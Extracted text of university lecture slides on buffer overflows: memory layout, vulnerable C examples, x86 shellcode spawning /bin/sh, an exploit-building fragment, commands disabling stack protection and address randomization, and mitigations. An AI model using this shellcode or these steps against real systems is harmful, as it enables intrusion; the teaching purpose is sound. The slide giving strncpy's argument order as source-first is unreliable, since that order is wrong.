lecture: buffer overflow - iowa state universityhome.eng.iastate.edu/~othmanel/files/cpre562/lecture...

Lecture: Buffer Overflow

Lotfi ben Othmane

• What is a buffer overflow?• How to exploit a buffer overflow?• What are the mitigation techniques?• How to detect a buffer overflow?

2

Plan

3

Memory Layout

Stack

HeapBSS SegmentData SegmentText SegmentLow address

High address

#include<string.h>#include<stdio.h>#include <stdlib.h>

int x = 100;int main(){

// data stored on stack

int a=2;float b=2.5;

static int y;// allocate memory on heap

int*ptr = (int*) malloc(2*sizeof(int));// values 5 and 6 stored on heap

ptr[0]=5;ptr[1]=6;// deallocate memory on heapfree(ptr);return 1;

} 4

Memory Layout

Example1.c

ü x is at 0x804a01c content 100

ü a is at 0xbff21cd4 content 2ü b is at 0xbff21cd8 content 2.500000

ü y is at 0x804a028 content 0

ü ptr is at 0xbff21cdc, content 0x8f64008

ü ptr is at 0x8f64008, content 5ü ptr is at 0x8f6400c, content 6

5

Memory Layout

Data segment

Stack

BSS segment

Heap

#include<string.h>#include<stdio.h>#include <stdlib.h>

int x = 100;int main(){

// data stored on stack

int a=2;float b=2.5;

static int y;// allocate memory on heap

int*ptr = (int*) malloc(2*sizeof(int));

// values 5 and 6 stored on heap

ptr[0]=5;ptr[1]=6;// deallocate memory on heapfree(ptr);return 1;

}

Stack

int main(){

char buffer2[50];char buffer[12];char *str ="This is definitely longer than 12";strcpy(buffer, str);return 1;

}

6

Simple Buffer Overflow

What is the content of buffer?

What is the content of buffer 2?

Example2.c

Buffer overflow - More data is copied to the destination buffer than the size of the allocated space .

7

Buffer Overflow

8

Simple Buffer Overflow

int main(){

char buffer2[50];char buffer[12];char *str ="This is definitely longer than 12";strcpy(buffer, str);return 1;

}

9

Simple Buffer Overflow

Example2.c

*** stack smashing detected ***

Stackguard: mechanism to detect changes to specific data stored in the stack

Disable: gcc [filename.c] –fno-stack-protector

10

Protection Mechanism 1 - Stackguard

11

Protection Mechanism - Stackguard

Return Address

Buffer[11]

Guard

….Buffer[0]

Set the guardmovl %gs:20, %eaxmovl %eax, -12(%ebp)xorl %eax, %eax

Check the guardmovl -12(%ebp), %eaxxorl %gs:20, %eaxJe .L2Call _stack_chk_fail

Code inserted by compiler

int main(){

char buffer[12];char buffer2[50];char *str ="This is definitely longer than 12";strcpy(buffer, str);return 1;

}

12

Simple Buffer Overflow

What is the content of buffer?

What is the content of buffer 2?

Let’s change the order of buffer and buffer 2. Can we still have the overflow?

int main(){

char *input = (char *)malloc(1);char *secret= (char *)malloc(1);strcpy(secret, "Password");printf("Enter password");scanf("%s", input);if(strcnmp(input,secret,10)==0)

{ printf("Access granted");}else

{printf("Access Denied");}

13

Heap-based Buffer Overflow

Example3.c

Can we get access without entering the correct password?

char buff[10]; int pass = 0;char secret[10];strcpy(buff,"Password");printf("\n Enter your password: ");gets(secret);if(strcmp(secret, buff))

{ printf ("\n Wrong Password \n");}else

{printf ("\n Correct Password \n");pass = 1; }

if(pass)printf ("\n Root privileges given to the user \n");

14

So What?

Example4.c

Can we get access without entering the correct password?

How can we better use the weakness?

15

Uses of Buffer Overflow

int bof(char *str){

char buffer[24];

strcpy(buffer, str);

return 1;}

16

Stack Memory Layout

•int main(int argc, char **argv){

char str[517];FILE *badfile;

badfile = fopen("badfile", "r");fread(str, sizeof(char), 517, badfile);bof(str);

printf("Returned Properly\n");return 1;

}

stack.c

int bof(char *str){

char buffer[24];

strcpy(buffer, str);

return 1;}

17

Stack Memory Layout

value of *str

Return Address

Previous Frame pointer

Value of buffer

Current framepointer

Arguments

Local variables

High address

Low address

18

Stack Buffer Overflow

int bof(char *str){

char buffer[24];

strcpy(buffer, str);

return 1;}

•int main(int argc, char **argv){

char str[517];FILE *badfile;

badfile = fopen("badfile", "r");fread(str, sizeof(char), 517, badfile);bof(str);

printf("Returned Properly\n");return 1;

}

Example5.c

Can we have code in “badfile”?

#include stdio.hvoid main() {

char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);

}

19

Exploit - Shell Code

“\x31\xc0" /* xorl %eax,%eax */"\x50" /* pushl %eax */"\x68""//sh" /* pushl $0x68732f2f */"\x68""/bin" /* pushl $0x6e69622f */"\x89\xe3" /* movl %esp,%ebx */"\x50" /* pushl %eax */"\x53" /* pushl %ebx */"\x89\xe1" /* movl %esp,%ecx */"\x99" /* cdql */"\xb0\x0b" /* movb $0x0b,%al */"\xcd\x80" /* int $0x80 */

20

Shell Exploit

int bof(char *str){

char buffer[24];

strcpy(buffer, str);

return 1;}

21

Stack Memory Layout for Functions

Exploit

Return Address

Previous Frame pointer

Value of bufferCurrent framepointer

Arguments

Local variables

High address

Low address

Can we change the return address?

2222

Exploit

Return Address

Previous Frame pointer

Value of bufferCurrent framepointer

Arguments

Local variables

High address

Low address

Stack Memory Layout for Functions

23

Stack Overflow

void* readaddress(){asm("movl %ebp, %eax");

}

int bof(char *str){

char buffer[24];

printf("\n Address of buffer %p", &buffer);printf("\n Ebp %p", readaddress());return 1;

}

Example5.c

addr = 0xbffff148 + offset;

ptr = buffer;addr_ptr = (long*)(ptr);

for (i = 0; i < 10; i++)*(addr_ptr++) = addr;

memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));

24

Final Exploit

Exploit_final.c

25

Stack Overflow

int bof(char *str){

char buffer[24];

strcpy(buffer, str);

return 1;}

•int main(int argc, char **argv){

char str[517];FILE *badfile;

badfile = fopen("badfile", "r");fread(str, sizeof(char), 517, badfile);bof(str);

printf("Returned Properly\n");return 1;

}

stack.c

Are we ready?

Perform the attack

We observe that the program does not display: Returned Properly

26

void host_lookup(char *user_supplied_addr){struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);

validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);}

27

Buffer Overflow in Real Word

Buffer overflow have played a major roles in attacks such as:• Moris worm of 1988• Code Red worm of 2001• Etc.

28

So

• Randomize the memory space of the key data area• Text segment• Stack• Heap• Data segment

• Disable randomization: sudo sysctl –w kernel.randomize_va_space=0Value 2 for randomization

29

Protection 2 - Address Randomization

ü x is at 0x804a01c content 100

ü a is at 0xbff21cd4 content 2ü b is at 0xbff21cd8 content 2.500000

ü y is at 0x804a028 content 0

ü ptr is at 0xbff21cdc, content 0x8f64008ü ptr is at 0x8f64008, content 5ü ptr is at 0x8f6400c, content 6

30

Protection 2 - Address Randomization

Data segment

Stack

BSS segment

Heap

The number of possibilities is limited and could be guessed in few minutes

• There are safe implementations for memory management functions

• E.g., use strncpy(source, destination, size)

31

Protection 3 – Defensive Functions

32

Protection 4 – Detect Vulnerabilities Using Code Analysis

From Truecryt report, page 32

Code analysis: Ensure that boundaries are checked before copying

Arm race – attackers bypass protection mechanisms

33

Buffer Overflow Detection

Arada Locomate – V2V Device

34

Arada Locomate – V2V DeviceBuffer overflow hypothesis at read()

35

Thank you

Any Question?

36